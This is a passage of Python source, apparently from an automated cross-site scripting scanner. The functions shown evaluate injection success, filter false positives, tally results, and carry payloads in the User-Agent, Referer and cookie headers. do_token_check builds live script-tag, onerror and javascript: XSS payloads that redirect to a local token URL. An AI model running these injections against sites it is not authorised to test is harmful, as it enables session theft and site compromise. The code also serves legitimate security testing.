  1055.             # perform check response injection
    1056. 

  1056.             if c.info()["http-code"] in ["200", "302", "301"]:
    1057. 

  1057.                 if self.options.statistics:
    1058. 

  1058.                     self.success_connection = self.success_connection + 1
    1059. 

  1059.                 self._report_attack_success(c, dest_url, payload,
    1060. 

  1060.                                             query_string, url)
    1061. 

  1061.             else:
    1062. 

  1062.                 self._report_attack_failure(c, dest_url, payload,
    1063. 

  1063.                                             query_string, url)
    1064. 

  1064.         c.close()
    1065. 

  1065.         del c
    1066. 

  1066. 

  1067.     def encoding_permutations(self, enpayload_url):
    1068. 

  1068.         """
    1069. 

  1069.         perform encoding permutations on the url and query_string.
    1070. 

  1070.         """
    1071. 

  1071.         options = self.options
    1072. 

  1072.         if options.Cem: 
    1073. 

  1073.             enc_perm = options.Cem.split(",")
    1074. 

  1074.             for _enc in enc_perm:
    1075. 

  1075.                 enpayload_url = self.encmap[_enc](enpayload_url)
    1076. 

  1076.         else: 
    1077. 

  1077.             for enctype in list(self.encmap.keys()):
    1078. 

  1078.                 if getattr(options, enctype):
    1079. 

  1079.                     enpayload_url = self.encmap[enctype](enpayload_url)
    1080. 

  1080.         return enpayload_url
    1081. 

  1081. 

  1082.     def _report_attack_success(self, curl_handle, dest_url, payload,\
    1083. 

  1083.                                query_string, orig_url):
    1084. 

  1084.         """
    1085. 

  1085.         report connection success of an attack
    1086. 

  1086.         """
    1087. 

  1087.         if not orig_url in self.successful_urls:
    1088. 

  1088.             self.successful_urls.append(orig_url)
    1089. 

  1089.         options = self.options
    1090. 

  1090.         current_hashes = [] # to check for ongoing hashes
    1091. 

  1091.         if payload['browser'] == "[Heuristic test]":
    1092. 

  1092.             for key, value in self.hashed_injections.items():
    1093. 

  1093.                 if str(key) in dest_url:
    1094. 

  1094.                     if key not in current_hashes:
    1095. 

  1095.                         self.final_hashes[key] = value
    1096. 

  1096.                         current_hashes.append(key)
    1097. 

  1097.         elif self.options.hash:
    1098. 

  1098.             for key, value in self.hashed_injections.items():
    1099. 

  1099.                 self.final_hashes[key] = value
    1100. 

  1100.                 current_hashes.append(key)
    1101. 

  1101.         else:
    1102. 

  1102.             self.report("-"*45)
    1103. 

  1103.             self.report("\n[!] Hashing: \n")
    1104. 

  1104.             for key, value in self.hashed_injections.items():
    1105. 

  1105.                 if str(key) in dest_url:
    1106. 

  1106.                     if key not in current_hashes:
    1107. 

  1107.                         self.report(" [ " +key+" ] : [" , value + " ]")
    1108. 

  1108.                         self.final_hashes[key] = value
    1109. 

  1109.                         current_hashes.append(key)
    1110. 

  1110.                 else:
    1111. 

  1111.                     if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
    1112. 

  1112.                         b64_string = payload["payload"].split("[B64]")
    1113. 

  1113.                         b64_string = b64_string[1]
    1114. 

  1114.                         b64_string = b64_string.replace('PAYLOAD', key)
    1115. 

  1115.                         b64_string = b64encode(b64_string)
    1116. 

  1116.                         b64_string = urllib.parse.urlencode({'':b64_string})
    1117. 

  1117.                         if b64_string.startswith("="):
    1118. 

  1118.                             b64_string = b64_string.replace("=", "")
    1119. 

  1119.                         if str(b64_string) in str(dest_url):
    1120. 

  1120.                             if key not in current_hashes:
    1121. 

  1121.                                 self.report(" [ " +key+" ] : [" , value + " ]")
    1122. 

  1122.                                 self.final_hashes[key] = value
    1123. 

  1123.                                 current_hashes.append(key)
    1124. 

  1124.                     else: # when using encoders (Str, Hex, Dec...)
    1125. 

  1125.                         payload_string = payload["payload"].replace("PAYLOAD", key)
    1126. 

  1126.                         hashed_payload = self.encoding_permutations(payload_string)
    1127. 

  1127.                         if self.options.Cem:
    1128. 

  1128.                             enc_perm = options.Cem.split(",")
    1129. 

  1129.                             for e in enc_perm:
    1130. 

  1130.                                 hashed_payload = self.encoding_permutations(payload_string)
    1131. 

  1131.                                 if e == "Str":
    1132. 

  1132.                                     hashed_payload = hashed_payload.replace(",", "%2C")
    1133. 

  1133.                                 if e == "Mix":
    1134. 

  1134.                                     hashed_payload=urllib.parse.quote(hashed_payload)
    1135. 

  1135.                                 if e == "Dec":
    1136. 

  1136.                                     hashed_payload = hashed_payload.replace("&#", "%26%23")
    1137. 

  1137.                                 if e == "Hex":
    1138. 

  1138.                                     hashed_payload = hashed_payload.replace("%", "%25")
    1139. 

  1139.                                 if e == "Hes":
    1140. 

  1140.                                     hashed_payload = hashed_payload.replace("&#", "%26%23")
    1141. 

  1141.                                     hashed_payload = hashed_payload.replace(";", "%3B")
    1142. 

  1142.                         else:
    1143. 

  1143.                             if self.options.Str:
    1144. 

  1144.                                 hashed_payload = hashed_payload.replace(",", "%2C")
    1145. 

  1145.                             if self.options.Mix:
    1146. 

  1146.                                 hashed_payload=urllib.parse.quote(hashed_payload)
    1147. 

  1147.                             if self.options.Dec:
    1148. 

  1148.                                 hashed_payload = hashed_payload.replace("&#", "%26%23")
    1149. 

  1149.                             if self.options.Hex:
    1150. 

  1150.                                 hashed_payload = hashed_payload.replace("%", "%25")
    1151. 

  1151.                             if self.options.Hes:
    1152. 

  1152.                                 hashed_payload = hashed_payload.replace("&#", "%26%23")
    1153. 

  1153.                                 hashed_payload = hashed_payload.replace(";", "%3B")
    1154. 

  1154.                         if str(hashed_payload) in str(dest_url):
    1155. 

  1155.                             if key not in current_hashes:
    1156. 

  1156.                                 self.report(" [ " +key+" ] : [" , value + " ]")
    1157. 

  1157.                                 self.final_hashes[key] = value
    1158. 

  1158.             if self.extra_hashed_injections:
    1159. 

  1159.                 for k, v in self.extra_hashed_injections.items():
    1160. 

  1160.                     payload_url = str(v[1])
    1161. 

  1161.                     if payload_url == payload["payload"]:
    1162. 

  1162.                         if k not in current_hashes:
    1163. 

  1163.                             self.report(" [ " +k+" ] : [" , v[0] + " ]")
    1164. 

  1164.                             self.final_hashes[k] = v[0]
    1165. 

  1165.                             current_hashes.append(k)
    1166. 

  1166.             self.report("\n"+"-"*45+"\n")
    1167. 

  1167.         if payload['browser'] == "[Heuristic test]":
    1168. 

  1168.             self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
    1169. 

  1169.         else:
    1170. 

  1170.             if self.extra_hashed_injections:
    1171. 

  1171.                 extra_attacks=[]
    1172. 

  1172.                 if options.xsa:
    1173. 

  1173.                     extra_attacks.append("XSA")
    1174. 

  1174.                 if options.xsr:
    1175. 

  1175.                     extra_attacks.append("XSR")
    1176. 

  1176.                 if options.coo:
    1177. 

  1177.                     extra_attacks.append("COO")
    1178. 

  1178.                 if extra_attacks:
    1179. 

  1179.                     extra_attacks = "+ "+ str(extra_attacks)
    1180. 

  1180.                 if options.postdata:
    1181. 

  1181.                     self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
    1182. 

  1182.                 else:
    1183. 

  1183.                     self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
    1184. 

  1184.             else:
    1185. 

  1185.                 if options.postdata:
    1186. 

  1186.                     self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
    1187. 

  1187.                 else:
    1188. 

  1188.                     self.report("[*] Trying: \n\n" + dest_url.strip() + "\n")
    1189. 

  1189.             if not self.options.hash and not self.options.script:
    1190. 

  1190.                 if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
    1191. 

  1191.                     pass
    1192. 

  1192.                 else:
    1193. 

  1193.                     self.report("-"*45)
    1194. 

  1194.         if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
    1195. 

  1195.             pass
    1196. 

  1196.         else:
    1197. 

  1197.             if not "XSS" in dest_url or not "X1S" in dest_url:
    1198. 

  1198.                 if self.options.xsa or self.options.xsr or self.options.coo:
    1199. 

  1199.                     pass
    1200. 

  1200.                 else:
    1201. 

  1201.                     self.report("-"*45)
    1202. 

  1202.                     self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
    1203. 

  1203.                     if not self.options.verbose:
    1204. 

  1204.                         self.report("-"*45 + "\n")
    1205. 

  1205.             else:
    1206. 

  1206.                 self.report("-"*45)
    1207. 

  1207.                 self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
    1208. 

  1208.                 if not self.options.verbose:
    1209. 

  1209.                     self.report("-"*45 + "\n")
    1210. 

  1210. 	    # statistics injections counters
    1211. 

  1211.         if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
    1212. 

  1212.             self.check_positives = self.check_positives + 1
    1213. 

  1213.         elif payload['browser']=="[Data Control Protocol Injection]":
    1214. 

  1214.             self.dcp_injection = self.dcp_injection + 1
    1215. 

  1215.         elif payload['browser']=="[Document Object Model Injection]":
    1216. 

  1216.             self.dom_injection = self.dom_injection + 1
    1217. 

  1217.         elif payload['browser']=="[Induced Injection]":
    1218. 

  1218.             self.httpsr_injection = self.httpsr_injection + 1
    1219. 

  1219.         elif payload['browser']=="[manual_injection]":
    1220. 

  1220.             self.manual_injection = self.manual_injection + 1
    1221. 

  1221.         else:
    1222. 

  1222.             self.auto_injection = self.auto_injection +1
    1223. 

  1223.         if not self.hashed_injections:
    1224. 

  1224.             for k, v in self.extra_hashed_injections.items():
    1225. 

  1225.                 if k in current_hashes:
    1226. 

  1226.                     if v[0] == "XSA":
    1227. 

  1227.                         agent = v[1]
    1228. 

  1228.                         agent = agent.replace("PAYLOAD", k)
    1229. 

  1229.                         Curl.agent = agent
    1230. 

  1230.                     if v[0] == "XSR":
    1231. 

  1231.                         referer = v[1]
    1232. 

  1232.                         referer = referer.replace("PAYLOAD", k)
    1233. 

  1233.                         Curl.referer = referer
    1234. 

  1234.                     if v[0] == "COO":
    1235. 

  1235.                         cookie = v[1]
    1236. 

  1236.                         cookie = cookie.replace("PAYLOAD", k)
    1237. 

  1237.                         Curl.cookie = cookie
    1238. 

  1238.         else:
    1239. 

  1239.             for key, value in self.hashed_injections.items():
    1240. 

  1240.                 for k, v in self.extra_hashed_injections.items():
    1241. 

  1241.                     payload_url = v[1]
    1242. 

  1242.                     payload_url = payload_url.replace("PAYLOAD",key)
    1243. 

  1243.                     payload_url = payload_url.replace(" ", "+") # black magic!
    1244. 

  1244.                     final_dest_url = str(urllib.parse.unquote(dest_url.strip()))
    1245. 

  1245.                     if payload_url in final_dest_url:
    1246. 

  1246.                         if v[0] == "XSA":
    1247. 

  1247.                             agent = v[1]
    1248. 

  1248.                             agent = agent.replace("PAYLOAD", k)
    1249. 

  1249.                             Curl.agent = agent
    1250. 

  1250.                         if v[0] == "XSR":
    1251. 

  1251.                             referer = v[1]
    1252. 

  1252.                             referer = referer.replace("PAYLOAD", k)
    1253. 

  1253.                             Curl.referer = referer
    1254. 

  1254.                         if v[0] == "COO":
    1255. 

  1255.                             cookie = v[1]
    1256. 

  1256.                             cookie = cookie.replace("PAYLOAD", k)
    1257. 

  1257.                             Curl.cookie = cookie
    1258. 

  1258.                     else:
    1259. 

  1259.                         if k in current_hashes:
    1260. 

  1260.                             if v[0] == "XSA":
    1261. 

  1261.                                 agent = v[1]
    1262. 

  1262.                                 agent = agent.replace("PAYLOAD", k)
    1263. 

  1263.                                 Curl.agent = agent
    1264. 

  1264.                             if v[0] == "XSR":
    1265. 

  1265.                                 referer = v[1]
    1266. 

  1266.                                 referer = referer.replace("PAYLOAD", k)
    1267. 

  1267.                                 Curl.referer = referer
    1268. 

  1268.                             if v[0] == "COO":
    1269. 

  1269.                                 cookie = v[1]
    1270. 

  1270.                                 cookie = cookie.replace("PAYLOAD", k)
    1271. 

  1271.                                 Curl.cookie = cookie
    1272. 

  1272.         if options.verbose:
    1273. 

  1273.             self.report("-"*45)
    1274. 

  1274.             self.report("\n[+] HTTP Headers Verbose:\n")
    1275. 

  1275.             self.report(" [Client Request]")
    1276. 

  1276.             Curl.print_options()
    1277. 

  1277.             self.report(" [Server Reply]\n")
    1278. 

  1278.             self.report(curl_handle.info())
    1279. 

  1279.         self.report("="*45)
    1280. 

  1280.         self.report("[*] Injection(s) Results:")
    1281. 

  1281.         self.report("="*45 + "\n")
    1282. 

  1282.         if payload['browser']=="[Heuristic test]":
    1283. 

  1283.             for key, value in self.final_hashes.items():
    1284. 

  1284.                 if str(key) in dest_url:
    1285. 

  1285.                     heuristic_string = key
    1286. 

  1286.                     heuristic_param = str(payload['payload']).strip('XSS')
    1287. 

  1287.                     # checking heuristic responses
    1288. 

  1288.                     if heuristic_string in curl_handle.body():
    1289. 

  1289.                         # ascii
    1290. 

  1290.                         if heuristic_param == "\\":
    1291. 

  1291.                             self.heuris_backslash_found = self.heuris_backslash_found + 1
    1292. 

  1292.                         # / same as ASCII and Unicode
    1293. 

  1293.                         elif heuristic_param == "/":
    1294. 

  1294.                             self.heuris_slash_found = self.heuris_slash_found + 1
    1295. 

  1295.                             self.heuris_une_slash_found = self.heuris_une_slash_found + 1
    1296. 

  1296.                         elif heuristic_param == ">":
    1297. 

  1297.                             self.heuris_mayor_found = self.heuris_mayor_found + 1
    1298. 

  1298.                         elif heuristic_param == "<":
    1299. 

  1299.                             self.heuris_minor_found = self.heuris_minor_found + 1
    1300. 

  1300.                         elif heuristic_param == ";":
    1301. 

  1301.                             self.heuris_semicolon_found = self.heuris_semicolon_found + 1
    1302. 

  1302.                         elif heuristic_param == "'":
    1303. 

  1303.                             self.heuris_colon_found = self.heuris_colon_found + 1
    1304. 

  1304.                         elif heuristic_param == '"':
    1305. 

  1305.                             self.heuris_doublecolon_found = self.heuris_doublecolon_found + 1
    1306. 

  1306.                         elif heuristic_param == "=":
    1307. 

  1307.                             self.heuris_equal_found = self.heuris_equal_found + 1
    1308. 

  1308.                         # une
    1309. 

  1309.                         elif heuristic_param == "%5C":
    1310. 

  1310.                             self.heuris_une_backslash_found = self.heuris_une_backslash_found + 1
    1311. 

  1311.                         elif heuristic_param == "%3E":
    1312. 

  1312.                             self.heuris_une_mayor_found = self.heuris_une_mayor_found + 1
    1313. 

  1313.                         elif heuristic_param == "%3C":
    1314. 

  1314.                             self.heuris_une_minor_found = self.heuris_une_minor_found + 1
    1315. 

  1315.                         elif heuristic_param == "%3B":
    1316. 

  1316.                             self.heuris_une_semicolon_found = self.heuris_une_semicolon_found + 1
    1317. 

  1317.                         elif heuristic_param == "%27":
    1318. 

  1318.                             self.heuris_une_colon_found = self.heuris_une_colon_found + 1
    1319. 

  1319.                         elif heuristic_param == "%22":
    1320. 

  1320.                             self.heuris_une_doublecolon_found = self.heuris_une_doublecolon_found + 1
    1321. 

  1321.                         elif heuristic_param == "%3D":
    1322. 

  1322.                             self.heuris_une_equal_found = self.heuris_une_equal_found + 1
    1323. 

  1323.                         # dec
    1324. 

  1324.                         elif heuristic_param == "&#92":
    1325. 

  1325.                             self.heuris_dec_backslash_found = self.heuris_dec_backslash_found + 1
    1326. 

  1326.                         elif heuristic_param == "&#47":
    1327. 

  1327.                             self.heuris_dec_slash_found = self.heuris_dec_slash_found + 1
    1328. 

  1328.                         elif heuristic_param == "&#62":
    1329. 

  1329.                             self.heuris_dec_mayor_found = self.heuris_dec_mayor_found + 1
    1330. 

  1330.                         elif heuristic_param == "&#60":
    1331. 

  1331.                             self.heuris_dec_minor_found = self.heuris_dec_minor_found + 1
    1332. 

  1332.                         elif heuristic_param == "&#59":
    1333. 

  1333.                             self.heuris_dec_semicolon_found = self.heuris_dec_semicolon_found + 1
    1334. 

  1334.                         elif heuristic_param == "&#39":
    1335. 

  1335.                             self.heuris_dec_colon_found = self.heuris_dec_colon_found + 1
    1336. 

  1336.                         elif heuristic_param == "&#34":
    1337. 

  1337.                             self.heuris_dec_doublecolon_found = self.heuris_dec_doublecolon_found + 1
    1338. 

  1338.                         elif heuristic_param == "&#61":
    1339. 

  1339.                             self.heuris_dec_equal_found = self.heuris_dec_equal_found + 1
    1340. 

  1340.                         self.add_success(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # success!
    1341. 

  1341.                     else:
    1342. 

  1342.                         if heuristic_param == "\\":
    1343. 

  1343.                             self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
    1344. 

  1344.                         elif heuristic_param == "/":
    1345. 

  1345.                             self.heuris_slash_notfound = self.heuris_slash_notfound + 1
    1346. 

  1346.                         elif heuristic_param == ">":
    1347. 

  1347.                             self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
    1348. 

  1348.                         elif heuristic_param == "<":
    1349. 

  1349.                             self.heuris_minor_notfound = self.heuris_minor_notfound + 1
    1350. 

  1350.                         elif heuristic_param == ";":
    1351. 

  1351.                             self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
    1352. 

  1352.                         elif heuristic_param == "'":
    1353. 

  1353.                             self.heuris_colon_notfound = self.heuris_colon_notfound + 1
    1354. 

  1354.                         elif heuristic_param == '"':
    1355. 

  1355.                             self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
    1356. 

  1356.                         elif heuristic_param == "=":
    1357. 

  1357.                             self.heuris_equal_notfound = self.heuris_equal_notfound + 1
    1358. 

  1358.                         self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
    1359. 

  1359.         elif self.options.hash:
    1360. 

  1360.             for key, value in self.final_hashes.items():
    1361. 

  1361.                 if str(key) in dest_url:
    1362. 

  1362.                     if key in curl_handle.body():
    1363. 

  1363.                         self.add_success(dest_url, key, value, query_string, orig_url, 'hashing check') # success!
    1364. 

  1364.                     else:
    1365. 

  1365.                         self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
    1366. 

  1366.         else:
    1367. 

  1367.             for key, value in self.final_hashes.items(): 
    1368. 

  1368.                 if key in current_hashes:
    1369. 

  1369.                     if "XSA" in value:
    1370. 

  1370.                         method = "XSA"
    1371. 

  1371.                         hashing = key
    1372. 

  1372.                     elif "XSR" in value:
    1373. 

  1373.                         method = "XSR"
    1374. 

  1374.                         hashing = key
    1375. 

  1375.                     elif "COO" in value:
    1376. 

  1376.                         method = "COO"
    1377. 

  1377.                         hashing = key
    1378. 

  1378.                     else:
    1379. 

  1379.                         method = value
    1380. 

  1380.                         hashing = key
    1381. 

  1381.                     if not hashing:
    1382. 

  1382.                         pass
    1383. 

  1383.                     else:
    1384. 

  1384.                         if hashing not in dest_url:
    1385. 

  1385.                             if key in current_hashes:
    1386. 

  1386.                                 if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
    1387. 

  1387.                                     b64_string = payload["payload"].split("[B64]")
    1388. 

  1388.                                     b64_string = b64_string[1]
    1389. 

  1389.                                     b64_string = b64_string.replace('PAYLOAD', key)
    1390. 

  1390.                                     b64_string = b64encode(b64_string)
    1391. 

  1391.                                     b64_string = urllib.parse.urlencode({'':b64_string})
    1392. 

  1392.                                     if b64_string.startswith("="):
    1393. 

  1393.                                         b64_string = b64_string.replace("=", "")
    1394. 

  1394.                                     if str(b64_string) in str(dest_url):
    1395. 

  1395.                                         self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)                            
    1396. 

  1396.                                 else:
    1397. 

  1397.                                     self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)                            
    1398. 

  1398.                         else:
    1399. 

  1399.                             self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
    1400. 

  1400.         self.report("")
    1401. 

  1401. 

  1402.     def check_hash_on_target(self, hashing, dest_url, orig_url, payload, query_string, method, curl_handle):
    1403. 

  1403.         options = self.options
    1404. 

  1404.         c_info = str(curl_handle.info())
    1405. 

  1405.         c_body = str(curl_handle.body())
    1406. 

  1406.         if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
    1407. 

  1407.             b64_string = payload["payload"].split("[B64]")
    1408. 

  1408.             b64_string = b64_string[1]
    1409. 

  1409.             b64_string = b64_string.replace('PAYLOAD', hashing)
    1410. 

  1410.             b64_string = b64encode(b64_string)
    1411. 

  1411.             if b64_string.startswith("="):
    1412. 

  1412.                 b64_string = b64_string.replace("=", "")
    1413. 

  1413.             hashing = b64_string
    1414. 

  1414.         if str(hashing) in c_body and "http-code: 200" in c_info: # [XSS CHECKPOINT: anti-false positives]
    1415. 

  1415.             self.check_false_positives(hashing, c_body, dest_url, payload, query_string, orig_url, method)
    1416. 

  1416.         else:
    1417. 

  1417.             self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
    1418. 

  1418. 

  1419.     def check_false_positives(self, hashing, c_body, dest_url, payload, query_string, orig_url, method):
    1420. 

  1420.         # some anti false positives checkers
    1421. 

  1421.         if str(self.options.discode) in c_body: # provided by user
    1422. 

  1422.             self.report("[Info] Reply contains code [ --discode ] provided to be discarded -> [DISCARDING!]\n")
    1423. 

  1423.             self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
    1424. 

  1424.         else:
    1425. 

  1425.             if str('/&gt;' + hashing) in c_body or str('href=' + dest_url + hashing) in c_body or str('content=' + dest_url + hashing) in c_body:
    1426. 

  1426.                 self.report("[Info] Reply looks like a 'false positive' -> [DISCARDING!]\n")
    1427. 

  1427.                 self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
    1428. 

  1428.             elif str(hashing+",") in c_body or str(hashing+'","') in c_body:
    1429. 

  1429.                 self.report("[Info] Reply looks like a 'false positive' -> [DISCARDING!]\n")
    1430. 

  1430.                 self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
    1431. 

  1431.             else:
    1432. 

  1432.                 if self.options.discode:
    1433. 

  1433.                     self.report("[Info] Reply does NOT contain code [ --discode ] provided to be discarded -> [ADDING!] ;-)\n")
    1434. 

  1434.                 self.add_success(dest_url, payload, hashing, query_string, orig_url, method) # success!       
    1435. 

  1435. 

  1436.     def add_failure(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
    1437. 

  1437.         """
    1438. 

  1438.         Add an attack that failed to inject
    1439. 

  1439.         """
    1440. 

  1440.         if method == "heuristic":
    1441. 

  1441.             self.report(" [ NOT-FOUND ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
    1442. 

  1442.             self.hash_notfound.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
    1443. 

  1443.         elif method == "hashing check":
    1444. 

  1444.             self.report(" [ NOT-FOUND ] -> [ " + str(hashing) + " ] : [ hashing_check ]")
    1445. 

  1445.             self.hash_notfound.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
    1446. 

  1446.         else:
    1447. 

  1447.             self.report(" [ NOT-FOUND ] -> [ " + hashing + " ] : [ " + method + " ]")
    1448. 

  1448.             self.hash_notfound.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
    1449. 

  1449.           
    1450. 

  1450.     def add_success(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
    1451. 

  1451.         """
    1452. 

  1452.         Add an attack that managed to inject the code
    1453. 

  1453.         """
    1454. 

  1454.         if method == "heuristic":
    1455. 

  1455.             self.report(" [ FOUND! ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
    1456. 

  1456.             self.hash_found.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
    1457. 

  1457.         elif method == "hashing check":
    1458. 

  1458.             self.report(" [ FOUND! ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
    1459. 

  1459.             self.hash_found.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
    1460. 

  1460.         else:
    1461. 

  1461.             payload_sub =  payload['payload']
    1462. 

  1462.             self.report(" [ FOUND! ] -> [ " + hashing + " ] : [ " + method + " ] -> [ " + payload_sub + " ]")
    1463. 

  1463.             self.hash_found.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
    1464. 

  1464.         for reporter in self._reporters:
    1465. 

  1465.             reporter.add_success(dest_url)
    1466. 

  1466.         if self.options.reversecheck:
    1467. 

  1467.             if self.options.dcp or self.options.inducedcode or self.options.dom:
    1468. 

  1468.                 pass
    1469. 

  1469.             else:
    1470. 

  1470.                 self.do_token_check(orig_url, hashing, payload, query_string, dest_url)
    1471. 

  1471. 

  1472.     def do_token_check(self, orig_url, hashing, payload, query_string, dest_url):
    1473. 

  1473.         if "VECTOR" in orig_url:
    1474. 

  1474.             dest_url = orig_url
    1475. 

  1475.         else:
    1476. 

  1476.             if not dest_url.endswith("/"):
    1477. 

  1477.                 dest_url = dest_url + "/"
    1478. 

  1478.             dest_url = orig_url + query_string + payload['payload']
    1479. 

  1479. 

  1480.         tok_url = None
    1481. 

  1481.         self_url = "http://localhost:19084/success/" + hashing
    1482. 

  1482.         shadow_js_inj = "document.location=document.location.hash.substring(1)"
    1483. 

  1483.         shadow_inj = "<script>" + shadow_js_inj + "</script>"
    1484. 

  1484.         shadow_js_inj = shadow_js_inj
    1485. 

  1485.         dest_url = dest_url.split("#")[0]
    1486. 

  1486. 

  1487.         def requote(what):
    1488. 

  1488.             return urllib.parse.quote_plus(what)
    1489. 

  1489.         vector_and_payload = payload['payload']
    1490. 

  1490.         _e = self.encoding_permutations
    1491. 

  1491.         if 'XSS' in dest_url:
    1492. 

  1492.             dest_url = dest_url.replace('XSS', vector_and_payload)
    1493. 

  1493.         if 'X1S' in dest_url:
    1494. 

  1494.             dest_url = dest_url.replace('XSS', vector_and_payload)
    1495. 

  1495.         if 'VECTOR' in dest_url:
    1496. 

  1496.             dest_url = dest_url.replace('VECTOR', vector_and_payload)
    1497. 

  1497.         if '">PAYLOAD' in dest_url:
    1498. 

  1498.             tok_url = dest_url.replace('">PAYLOAD', _e('">' + shadow_inj))
    1499. 

  1499.             tok_url += '#' + self_url
    1500. 

  1500.         elif "'>PAYLOAD" in dest_url:
    1501. 

  1501.             tok_url = dest_url.replace("'>PAYLOAD", _e("'>" + shadow_inj))
    1502. 

  1502.             tok_url += '#' + self_url
    1503. 

  1503.         elif "javascript:PAYLOAD" in dest_url:
    1504. 

  1504.             tok_url = dest_url.replace('javascript:PAYLOAD',
    1505. 

  1505.                                        self.encoding_permutations("window.location='" + self_url+"';"))
    1506. 

  1506.             tok_url = dest_url.replace("javascript:PAYLOAD",
    1507. 

  1507.                                        _e("javascript:" + shadow_js_inj))
    1508. 

  1508.             tok_url+= '#' + self_url
    1509. 

  1509.         elif '"PAYLOAD"' in dest_url:
    1510. 

  1510.             tok_url = dest_url.replace('"PAYLOAD"', '"' + self_url + '"')
    1511. 

  1511.         elif "'PAYLOAD'" in dest_url:
    1512. 

  1512.             tok_url = dest_url.replace("'PAYLOAD'", "'" + self_url + "'")
    1513. 

  1513.         elif 'PAYLOAD' in dest_url and 'SRC' in dest_url:
    1514. 

  1514.             tok_url = dest_url.replace('PAYLOAD', self_url)
    1515. 

  1515.         elif "SCRIPT" in dest_url:
    1516. 

  1516.             tok_url = dest_url.replace('PAYLOAD',
    1517. 

  1517.                                       shadow_js_inj)
    1518. 

  1518.             tok_url += '#' + self_url
    1519. 

  1519.         elif 'onerror="PAYLOAD"' in dest_url:
    1520. 

  1520.             tok_url = dest_url.replace('onerror="PAYLOAD"', _e('onerror="' + shadow_inj + '"'))
    1521. 

  1521.             tok_url+= '#' + self_url
    1522. 

  1522.         elif 'onerror="javascript:PAYLOAD"' in dest_url:
    1523. 

  1523.             tok_url = dest_url.replace('javascript:PAYLOAD',
    1524. 

  1524.             				self.encoding_permutations("window.location='" + self_url+"';"))
    1525. 

  1525.             tok_url = dest_url.replace('onerror="javascript:PAYLOAD"',
    1526. 

  1526.                                        _e('onerror="javascript:' + shadow_js_inj + '"'))
    1527. 

  1527.             tok_url+= '#' + self_url
    1528. 

  1528.         elif '<PAYLOAD>' in dest_url:
    1529. 

  1529.             tok_url = dest_url.replace("<PAYLOAD>", _e(shadow_inj))
    1530. 

  1530.             tok_url+= '#' + self_url
    1531. 

  1531.         elif 'PAYLOAD' in dest_url:
    1532. 

  1532.             tok_url = dest_url.replace("PAYLOAD", _e(shadow_inj))
    1533. 

  1533.             tok_url+= '#' + self_url
    1534. 

  1534.         elif 'href' in dest_url and 'PAYLOAD' in dest_url:
    1535. 

  1535.             tok_url = dest_url.replace('PAYLOAD', self_url)
    1536. 

  1536.         elif 'HREF' in dest_url and 'PAYLOAD' in dest_url:
    1537. 

  1537.             tok_url = dest_url.replace('PAYLOAD', self_url)
    1538. 

  1538.         elif 'url' in dest_url and 'PAYLOAD' in dest_url:
    1539. 

  1539.             tok_url = dest_url.replace('PAYLOAD', self_url)
    1540. 

  1540.         self.final_attacks[hashing] = {'url': tok_url}
    1541. 

  1541.         if tok_url:
    1542. 

  1542.             try:
    1543. 

  1543.                 if self.options.reverseopen:
    1544. 

  1544.                     self.report("\n" + "-"*25+"\n")
    1545. 

  1545.                     self.report("[Info] Launching web browser (default) with a 'token' url...")
    1546. 

  1546.                     self._webbrowser.open(tok_url)
    1547. 

  1547.             except:
    1548. 

  1548.                 pass
    1549. 

  1549. 

  1550.     def _report_attack_failure(self, curl_handle, dest_url, payload,\
    1551. 

  1551.                                query_string, orig_url):
    1552. 

  1552.         """
    1553. 

  1553.         report connection failure of an attack
    1554. 

  1554.         """
    1555. 

  1555.         options = self.options
    1556. 

  1556.         current_hashes = [] # to check for ongoing hashes
    1557. 

  1557.         if payload['browser'] == "[Heuristic test]":
    1558. 

  1558.             for key, value in self.hashed_injections.items():
    1559. 

  1559.                 if key not in current_hashes:
    1560. 

  1560.                     self.final_hashes[key] = value
    1561. 

  1561.                     current_hashes.append(key)
    1562. 

  1562.         elif self.options.hash:
    1563. 

  1563.             for key, value in self.hashed_injections.items():
    1564. 

  1564.                 self.final_hashes[key] = value
    1565. 

  1565.                 current_hashes.append(key)
    1566. 

  1566.         else:
    1567. 

  1567.             self.report("-"*45)
    1568. 

